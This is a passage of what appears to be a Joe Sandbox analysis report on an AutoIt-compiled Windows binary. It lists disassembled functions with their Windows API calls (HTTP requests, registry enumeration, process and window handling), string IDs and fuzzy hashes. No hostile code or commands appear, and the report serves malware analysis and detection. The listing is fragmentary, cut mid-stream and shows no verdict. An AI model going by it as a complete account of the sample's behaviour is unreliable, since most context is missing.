                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                        • API String ID: 4237274167-1221869570
                                                        • Opcode ID: 2f4433bb7dbcc5b7f40dfc34c74afe7b454e1d402e0d473a6c9e488a8e26f118
                                                        • Instruction ID: 8a0249eafe2f8addd5eb2f8c2aa768ceb625e4c43f6e4b7c9972aab4404c13b3
                                                        • Opcode Fuzzy Hash: 2f4433bb7dbcc5b7f40dfc34c74afe7b454e1d402e0d473a6c9e488a8e26f118
                                                        • Instruction Fuzzy Hash: EB917C746083019FCB14DF24C48599ABBF4FF89714F14896DF88A8B362DB30E945CB92
                                                        APIs
                                                          • Part of subcall function 000DFC86: _wcscpy.LIBCMT ref: 000DFCA9
                                                        • _memset.LIBCMT ref: 00122B87
                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00122BB6
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00122C69
                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00122C97
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                        • String ID: 0
                                                        • API String ID: 4152858687-4108050209
                                                        • Opcode ID: 55af1975985b4ffc13363534bf4570aa8bf6d8da8d34813fa4148f52d564c37d
                                                        • Instruction ID: 6f684f6b3a05c3cb4b07566bd558aef0ca8aee14184f408dace05154fc7c8117
                                                        • Opcode Fuzzy Hash: 55af1975985b4ffc13363534bf4570aa8bf6d8da8d34813fa4148f52d564c37d
                                                        • Instruction Fuzzy Hash: DA51B171508321AFD725AF28E845AAF77E8EF55310F040A2DF895E72A1DB70CD648B52
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memmove$_free
                                                        • String ID: 3c$_
                                                        • API String ID: 2620147621-867841958
                                                        • Opcode ID: b2b92be34cd2a98dc6e084c72c658e5f065f30c588275d4eebdb5dbf09d53b3c
                                                        • Instruction ID: 6c8d7ee9e43454490eb0f172e18ffb3147e3e512672386476264e877dba9253e
                                                        • Opcode Fuzzy Hash: b2b92be34cd2a98dc6e084c72c658e5f065f30c588275d4eebdb5dbf09d53b3c
                                                        • Instruction Fuzzy Hash: 9B518A756083418FDB64CF28C880B6BBBE5BF85300F44482EE98997351EB35E941CB53
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _memset$_memmove
                                                        • String ID: 3c$ERCP
                                                        • API String ID: 2532777613-791435382
                                                        • Opcode ID: 8fa4216a35edd9975c511724f5c2fa7955a9115b58883407f6d08b04cf822985
                                                        • Instruction ID: 17172cee820411ded23c28d871d67db22a72b0076abec31307d1c87efcaf60bc
                                                        • Opcode Fuzzy Hash: 8fa4216a35edd9975c511724f5c2fa7955a9115b58883407f6d08b04cf822985
                                                        • Instruction Fuzzy Hash: FE519E71900705DFDB28CFA5C981BEAB7F4AF48304F20856FE54ADB241E771AA84CB50
                                                        APIs
                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0011D5D4
                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0011D60A
                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0011D61B
                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0011D69D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                        • String ID: DllGetClassObject
                                                        • API String ID: 753597075-1075368562
                                                        • Opcode ID: b0aea36a5a1b6ad669fe59b53fc444db9cc662ebde8e8d4cdb1b043ab93301d5
                                                        • Instruction ID: 4dfdfc5fe54ee0bd2ad7442dc47c6b9657062a0f86f580624ccc3d7cf0a4ded2
                                                        • Opcode Fuzzy Hash: b0aea36a5a1b6ad669fe59b53fc444db9cc662ebde8e8d4cdb1b043ab93301d5
                                                        • Instruction Fuzzy Hash: E3418EB2600204EFDB09CF64D884ADA7BB9EF45314F1581BDEC099F209E7B1D984CBA0
                                                        APIs
                                                        • _memset.LIBCMT ref: 001227C0
                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 001227DC
                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 00122822
                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00185890,00000000), ref: 0012286B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Menu$Delete$InfoItem_memset
                                                        • String ID: 0
                                                        • API String ID: 1173514356-4108050209
                                                        • Opcode ID: 9622a866e6b52b44740766589ac473a8558e1b821635c21b23edcad8bd47a61f
                                                        • Instruction ID: 41c51e91c9c69babe10be505d14fc97404fcad5ef7fc83940c8e066fa270c73e
                                                        • Opcode Fuzzy Hash: 9622a866e6b52b44740766589ac473a8558e1b821635c21b23edcad8bd47a61f
                                                        • Instruction Fuzzy Hash: 5741CE70204351AFD720DF24E844B6EBBE8EF85310F044A2DF8A697392D770E825CB52
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0013D7C5
                                                          • Part of subcall function 000C784B: _memmove.LIBCMT ref: 000C7899
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: BuffCharLower_memmove
                                                        • String ID: cdecl$none$stdcall$winapi
                                                        • API String ID: 3425801089-567219261
                                                        • Opcode ID: 242137b599fdd785f21edd59583078ae2c37f7b39cd6bd128d853ac3278de1fe
                                                        • Instruction ID: 5ccf51216c2a92de05fb83dbb2ea14e1026b9098a94e21c92c29d5de6f5d29d1
                                                        • Opcode Fuzzy Hash: 242137b599fdd785f21edd59583078ae2c37f7b39cd6bd128d853ac3278de1fe
                                                        • Instruction Fuzzy Hash: FC318D71904619AFCF00EF64DC519EEB3B5FF14320F1086A9E869A76D2DB71A945CB80
                                                        APIs
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                          • Part of subcall function 0011AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0011AABC
                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00118F14
                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00118F27
                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 00118F57
                                                          • Part of subcall function 000C7BCC: _memmove.LIBCMT ref: 000C7C06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$_memmove$ClassName
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 365058703-1403004172
                                                        • Opcode ID: 4372df08bdb7de044608ac1108581f1b90b5707812030c944f2419f566b8b094
                                                        • Instruction ID: 1de5b2f5f311a4baf4689ff605c21bdc9b5653ce7047ce243b25a311c07e8baa
                                                        • Opcode Fuzzy Hash: 4372df08bdb7de044608ac1108581f1b90b5707812030c944f2419f566b8b094
                                                        • Instruction Fuzzy Hash: 0E210475A05105BEDB18ABB4CC85DFFB779DF06360F04852DF425A72E1DF35188A9A10
                                                        APIs
                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0013184C
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00131872
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001318A2
                                                        • InternetCloseHandle.WININET(00000000), ref: 001318E9
                                                          • Part of subcall function 00132483: GetLastError.KERNEL32(?,?,00131817,00000000,00000000,00000001), ref: 00132498
                                                          • Part of subcall function 00132483: SetEvent.KERNEL32(?,?,00131817,00000000,00000000,00000001), ref: 001324AD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                        • String ID:
                                                        • API String ID: 3113390036-3916222277
                                                        • Opcode ID: 6d49aea3d06163421e6fbe9dddf25aeee40a1360b673aead85b6e4fb252f82e4
                                                        • Instruction ID: 6421f03e43a831e75ae39fbbd89c273050d29e0996e17d3023f03c0c14001902
                                                        • Instruction Fuzzy Hash: E921CDB1500308BFEB11AF64CC85EBF7BEDEB89749F10416AF805A2240EB348D0597B4
                                                        APIs
                                                          • Part of subcall function 000C1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000C1D73
                                                          • Part of subcall function 000C1D35: GetStockObject.GDI32(00000011), ref: 000C1D87
                                                          • Part of subcall function 000C1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 000C1D91
                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00146461
                                                        • LoadLibraryW.KERNEL32(?), ref: 00146468
                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0014647D
                                                        • DestroyWindow.USER32(?), ref: 00146485
                                                        Similarity
                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                        • String ID: SysAnimate32
                                                        • API String ID: 4146253029-1011021900
                                                        • Opcode ID: fb3ad98e5a751b5a32c8074c6c6cbd871b9267572f2463b4306d4f0f2fb41917
                                                        • Instruction ID: a247a1d69271081ccf522f6030fe241a5df02048b300c53350740c318754f188
                                                        • Instruction Fuzzy Hash: E8219D75200205BFEF104FA4DC90EBB37ADEB5A368F148629FA54931B0D731DC919762
                                                        APIs
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00126DBC
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00126DEF
                                                        • GetStdHandle.KERNEL32(0000000C), ref: 00126E01
                                                        • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00126E3B
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: 2d1929d5e2d4b3f5b390ced1f489003eba701ebc57b802b18ab03f3f6c9fc6ef
                                                        • Instruction ID: e8ac24d55374668e7fcc1a192b4ddb3f5e599045b8dd101aed3eca1c4f7479d6
                                                        • Instruction Fuzzy Hash: 3821927560022DAFDB20AF69EC04A9A77F4EF55720F204A19FCE1D72E0D77099618B50
                                                        APIs
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00126E89
                                                        • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00126EBB
                                                        • GetStdHandle.KERNEL32(000000F6), ref: 00126ECC
                                                        • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00126F06
                                                        Similarity
                                                        • API ID: CreateHandle$FilePipe
                                                        • String ID: nul
                                                        • API String ID: 4209266947-2873401336
                                                        • Opcode ID: 4eeecc1508bc3c0b3af67aa586a934890a31e1362936f6d68c881f918a3604b1
                                                        • Instruction ID: 0927de62a5d6108722bb112836b74a3d6beb5f08d06ce2a99cf1ea922d60d8c9
                                                        • Instruction Fuzzy Hash: DC2180796003259BDB20EF69EC04AAA77E8EF55730F210A19FCA1D72D0DB70E961CB50
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0012AC54
                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0012ACA8
                                                        • __swprintf.LIBCMT ref: 0012ACC1
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,0014F910), ref: 0012ACFF
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                        • String ID: %lu
                                                        • API String ID: 3164766367-685833217
                                                        • Opcode ID: cb7bd08e5938c779afad509275d12df3e5f0d63729a0aff4e3cb20ae019c0764
                                                        • Instruction ID: 2b422021a7c56bbadb33f0e5c32456218b05526f226eb0b8cc02817eb99a4855
                                                        • Instruction Fuzzy Hash: C6217134A00109AFCB10DF65D945EEE7BB8EF89714B0040A9F909EB362DB71EA55CB61
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00121B19
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                        • API String ID: 3964851224-769500911
                                                        • Opcode ID: 68d065f7b25a7b06d70a32af2e7ea8b3961a351015d97e683a7f4aaf8f743bc8
                                                        • Instruction ID: a1b3857ec3d099241ec47996e2a609fe456cee125cc361b9fb2d7ca086e53e79
                                                        • Instruction Fuzzy Hash: F311AD309402989FCF00EFA4E8518FEB3B4FF26304B1488A8D818A7692EB325D46CB50
                                                        APIs
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0013EC07
                                                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0013EC37
                                                        • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0013ED6A
                                                        • CloseHandle.KERNEL32(?), ref: 0013EDEB
                                                        Similarity
                                                        • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                        • String ID:
                                                        • API String ID: 2364364464-0
                                                        • Opcode ID: 639ffa24f8428f7931bb154f67cfcacb51e34587bb41fb747ca39c5a2f4f2e3f
                                                        • Instruction ID: 03644242cd0852eb33057f5e73f14ab3b14402e9246fd384e9f68b08bc1fc9b5
                                                        • Instruction Fuzzy Hash: EE815F71604300AFD760EF28C886F6EB7E5AF84710F14881DF99A9B2D2DB71AC45CB55
                                                        Similarity
                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                        • String ID:
                                                        • API String ID: 1559183368-0
                                                        • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                        • Instruction ID: d118c3f56e4539e7e7a28b36c205bd8d6d57b2c06e507e8b1a959b179b72363b
                                                        • Instruction Fuzzy Hash: B2519371A00F85DFDB648E6ADC506AE77F6AF4032AF248B29F835B62D1D7709D508B40
                                                        APIs
                                                          • Part of subcall function 000C7DE1: _memmove.LIBCMT ref: 000C7E22
                                                          • Part of subcall function 00140E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013FDAD,?,?), ref: 00140E31
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001400FD
                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0014013C
                                                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00140183
                                                        • RegCloseKey.ADVAPI32(?,?), ref: 001401AF
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 001401BC
                                                        Similarity
                                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                        • String ID:
                                                        • API String ID: 3440857362-0
                                                        • Opcode ID: f1fe781a987aa2ebdb9dd37a6d1bd42215082d3dea15285b3bbec2d990fabe66
                                                        • Instruction ID: b796975f2628220b782d2b2574e2202a19df4e0b1f1c2af4f39ba1fd6f1dbc5a
                                                        • Instruction Fuzzy Hash: A8514771208204AFD715EF68C881FAEB7E9FF88714F40492DF5958B2A2DB31E945CB52
                                                        APIs
                                                          • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
                                                          • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
                                                        • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0013D927
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0013D9AA
                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 0013D9C6
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0013DA07
                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0013DA21
                                                          • Part of subcall function 000C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00127896,?,?,00000000), ref: 000C5A2C
                                                          • Part of subcall function 000C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00127896,?,?,00000000,?,?), ref: 000C5A50
                                                        Similarity
                                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 327935632-0
                                                        • Opcode ID: 459705c2a45c2f6fecb8e009d42239421a144352d917e55bd2a2d749605d50ba
                                                        • Instruction ID: 20f14709894eb624b6cdf3afdfcdddfe1d4584627a7d72acc4bc83d972425bc4
                                                        • Instruction Fuzzy Hash: DC51F635A00205DFCB04EFA8E484EADB7F5FF09324F158069E855AB322DB31AD45CB51
                                                        APIs
                                                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0012E61F
                                                        • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0012E648
                                                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0012E687
                                                          • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
                                                          • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
                                                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0012E6AC
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0012E6B4
                                                        Similarity
                                                        • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                        • String ID:
                                                        • API String ID: 1389676194-0
                                                        • Opcode ID: b4e80fd45e65bb7e1970e5a8ce16efe3d57b1d036f4ffccebe1a3b90245b013a
                                                        • Instruction ID: 2f20e66f04342ba63a7dd3887771991a6a5ac6fe218aaafe3c62d5e869a64f99
                                                        • Instruction Fuzzy Hash: 2251E639A00215DFCB01EF65C985EAEBBF5EF09714B1480A9E809AB362CB31ED55DB50
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b1ccf7553f6727a7bd098328d1d15f5244ad83d1bcefbd33a2377d7be670f5db
                                                        • Instruction ID: 3f842da3ab6d1a381ea69bb9b736c472ea33c710d70ac07d97e159f0cc8ab83e
                                                        • Opcode Fuzzy Hash: b1ccf7553f6727a7bd098328d1d15f5244ad83d1bcefbd33a2377d7be670f5db
                                                        • Instruction Fuzzy Hash: B241F679A84104AFD724DF28CC48FA9BBA9EF09720F970169F916A72F1C730AD41DB51
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 000C2357
                                                        • ScreenToClient.USER32(001857B0,?), ref: 000C2374
                                                        • GetAsyncKeyState.USER32(00000001), ref: 000C2399
                                                        • GetAsyncKeyState.USER32(00000002), ref: 000C23A7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AsyncState$ClientCursorScreen
                                                        • String ID:
                                                        • API String ID: 4210589936-0
                                                        • Opcode ID: 9ce7cda5b90411e6c200216369aec1ba33b4aeca75144fcd05e2f13d87cdc622
                                                        • Instruction ID: 548eebc89350a321e67df2cff9e6c2db72ff939a8bf00365dcf1b98c9c24e6ab
                                                        • Opcode Fuzzy Hash: 9ce7cda5b90411e6c200216369aec1ba33b4aeca75144fcd05e2f13d87cdc622
                                                        • Instruction Fuzzy Hash: C9419235604109FBDF259F68C844FEDBBB4BB05360F204319F829926A0CB349E90EF91
                                                        APIs
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001163E7
                                                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00116433
                                                        • TranslateMessage.USER32(?), ref: 0011645C
                                                        • DispatchMessageW.USER32(?), ref: 00116466
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00116475
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                        • String ID:
                                                        • API String ID: 2108273632-0
                                                        • Opcode ID: 7d81a254ce531a2f0e6fe5a7857f8a55600cc0ba31092d64b542d3d4a647a23d
                                                        • Instruction ID: 412713542e3ff2ee0ac42557e2743bc68ec3b35e3af5c3b68eedc2bc8a50a469
                                                        • Opcode Fuzzy Hash: 7d81a254ce531a2f0e6fe5a7857f8a55600cc0ba31092d64b542d3d4a647a23d
                                                        • Instruction Fuzzy Hash: 9731F231900612EFDB2CCFB4CC44BF67BADEB01300F54417AE425C29A0EB2699C9DBA0
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00118A30
                                                        • PostMessageW.USER32(?,00000201,00000001), ref: 00118ADA
                                                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00118AE2
                                                        • PostMessageW.USER32(?,00000202,00000000), ref: 00118AF0
                                                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00118AF8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessagePostSleep$RectWindow
                                                        • String ID:
                                                        • API String ID: 3382505437-0
